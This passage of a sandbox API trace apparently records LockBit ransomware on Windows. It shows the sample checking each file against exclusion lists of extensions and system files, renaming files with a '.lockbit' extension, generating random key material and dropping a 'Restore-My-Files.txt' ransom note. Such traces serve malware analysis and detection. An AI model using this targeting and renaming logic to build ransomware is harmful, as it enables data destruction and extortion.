Office\\CLIPART\\PUB60COR\\") returned="" [0144.809] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned=".WMF" [0144.809] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.809] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.810] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.811] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.811] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF.lockbit") returned 72 [0144.811] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0145.847] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.847] malloc (_Size=0x40068) returned 0x3df0008 [0145.847] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9604) returned 1 [0145.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0145.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0145.848] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0145.900] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.900] malloc (_Size=0xa6) returned 0x1fa2ed8 [0145.901] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0145.902] free (_Block=0x1fa2ed8) [0145.902] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0145.902] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0145.902] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0145.902] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56452630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6688, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152626.WMF", cAlternateFileName="")) returned 1 [0145.902] lstrcmpiW (lpString1=".", lpString2="J0152626.WMF") returned -1 [0145.902] lstrcmpiW (lpString1="..", lpString2="J0152626.WMF") returned -1 [0145.903] PathFindExtensionW (pszPath="J0152626.WMF") returned=".WMF" [0145.903] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0145.903] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0145.904] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0145.904] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152626.WMF") returned 1 [0145.905] lstrcmpiW (lpString1="ntldr", lpString2="J0152626.WMF") returned 1 [0145.905] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152626.WMF") returned 1 [0145.905] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152626.WMF") returned -1 [0145.905] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152626.WMF") returned -1 [0145.905] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152626.WMF") returned 1 [0145.905] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152626.WMF") returned -1 [0145.905] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0145.905] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned=".WMF" [0145.905] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0145.905] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0145.905] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0145.906] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0145.906] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF.lockbit") returned 72 [0145.906] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0145.907] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.907] malloc (_Size=0x40068) returned 0x1ff1e60 [0145.907] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=26248) returned 1 [0145.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0145.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.909] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0145.909] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0145.914] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.914] malloc (_Size=0xa6) returned 0x1fa2ed8 [0145.914] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0145.915] free (_Block=0x1fa2ed8) [0145.915] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0145.915] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0145.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0145.915] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56452630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x785c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152628.WMF", cAlternateFileName="")) returned 1 [0145.916] lstrcmpiW (lpString1=".", lpString2="J0152628.WMF") returned -1 [0145.916] lstrcmpiW (lpString1="..", lpString2="J0152628.WMF") returned -1 [0145.916] PathFindExtensionW (pszPath="J0152628.WMF") returned=".WMF" [0145.916] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0145.916] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0145.917] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0145.917] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0145.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152628.WMF") returned 1 [0145.918] lstrcmpiW (lpString1="ntldr", lpString2="J0152628.WMF") returned 1 [0145.918] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152628.WMF") returned 1 [0145.918] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152628.WMF") returned -1 [0145.918] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152628.WMF") returned -1 [0145.918] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152628.WMF") returned 1 [0145.918] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152628.WMF") returned -1 [0145.918] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0145.918] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned=".WMF" [0145.918] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0145.919] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0145.919] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0145.919] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0145.919] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0145.919] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0145.919] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0145.922] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0145.922] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF.lockbit") returned 72 [0145.923] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0145.923] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.923] malloc (_Size=0x40068) returned 0x3d70450 [0145.923] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=30812) returned 1 [0145.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0145.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0145.925] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0145.930] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.930] malloc (_Size=0xa6) returned 0x1fa2ed8 [0145.930] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0145.931] free (_Block=0x1fa2ed8) [0145.931] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0145.931] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0145.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0145.931] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8774, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152688.WMF", cAlternateFileName="")) returned 1 [0145.931] lstrcmpiW (lpString1=".", lpString2="J0152688.WMF") returned -1 [0145.931] lstrcmpiW (lpString1="..", lpString2="J0152688.WMF") returned -1 [0145.931] PathFindExtensionW (pszPath="J0152688.WMF") returned=".WMF" [0145.931] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0145.931] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0145.931] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0145.931] lstrcmpiW 